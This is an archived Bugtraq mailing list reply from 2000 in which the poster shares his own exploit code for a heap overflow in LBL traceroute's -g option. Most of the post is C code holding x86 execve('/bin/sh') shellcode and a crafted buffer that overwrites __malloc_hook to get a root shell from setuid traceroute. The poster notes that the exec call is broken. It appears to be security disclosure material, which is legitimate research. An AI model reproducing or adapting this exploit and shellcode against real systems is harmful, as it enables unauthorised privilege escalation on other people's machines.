Bugtraq mailing list archives
Re: Traceroute exploit + story
From: "Harrington, Perry" <pedward () WEBCOM COM>
Date: Thu, 5 Oct 2000 12:37:10 -0700
Hmm, this looks a lot like my post on the subject. The exploit I was working on was a lot simplier. It seems that some person chose to ignore my post which further explained my work and trashcan it (ahem). --Perry PS, the exec below is broken, otherwise it might work. This was my code I started on: #include <stdio.h> #include <unistd.h> #include <string.h> char code[] = "\xeb\x34" /* jmp GETADDR */ "\x90\x90\x90\x90" /* nop nop nop nop */ "\x90\x90\x90\x90" /* nop nop nop nop */ "\x90\x90\x90\x90" /* nop nop nop nop */ "\x90\x90\x90\x90" /* nop nop nop nop */ /* RUNPROG: */ "\x5e" /* popl %esi */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %al,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xfe\x06" /* incb (%esi) */ "\xfe\x46\x04" /* incb 0x4(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* incl %eax */ "\xcd\x80" /* int $0x80 */ /* GETADDR: */ "\xe8\xd7\xff\xff\xff" /* call RUNPROG */ ".bin.sh"; /* Program to run .XXX.XX */ extern void *__malloc_hook; typedef struct glue { int a; int b; void *p; void *q; } glue; void print_hex(char *p) { char *q; q=p; while(*q) { if (*q > 32 && *q < 127) { printf("%c",*q); } else { printf(" "); } q++; } } int main(void) { int ipa=0x2E312E31; int ipb=0x20312E31; int oh=0x00000000; int dummy=0x43434343; void *mh=(void **)__malloc_hook; void *usage=(void *)0x804a858; /* void *us=(void *)0x804cd80;*/ void *us=(void *)0x804cd7a; char buf[260]; char whocares[4096]; char *prog="/tmp/traceroute"; glue temp; FILE *out; printf ("malloc_hook %x code %x\n",mh, usage); memset(buf, 0x47,256); buf[255]='\0'; printf ("buf: %s\n", buf); temp.a=ipa; temp.b=ipb; temp.p=mh; temp.q=us+16; memcpy(buf, (void *)&temp,16); printf ("buf: %s\n", buf); temp.p=(void *)oh; temp.q=(void *)oh; temp.a=dummy; /* temp.b=dummy;*/ temp.b=0xFFFFFF01; printf("code(%d)\n", sizeof(code)); strncpy(buf+16, code, sizeof(code) -1); memcpy(buf+240, (void *)&temp, 0x10); printf ("buf: %s\n", buf); buf[255]='\0'; out=fopen("/tmp/code","w"); fputs(buf,out); fclose(out); printf("%s\n",whocares); execl(prog,prog,prog,"-g",buf,"-g 1","127.0.0.1", NULL); return 0; }
LBL traceroute exploit. By Dvorak, Synnergy Networks www.synnergy.net
-- Perry Harrington Director of zelur xuniL () perry () webcom com System Architecture Think Blue. /\
Current thread:
- Traceroute exploit + story W.H.J.Pinckaers (Oct 05)
- Re: Traceroute exploit + story Harrington, Perry (Oct 05)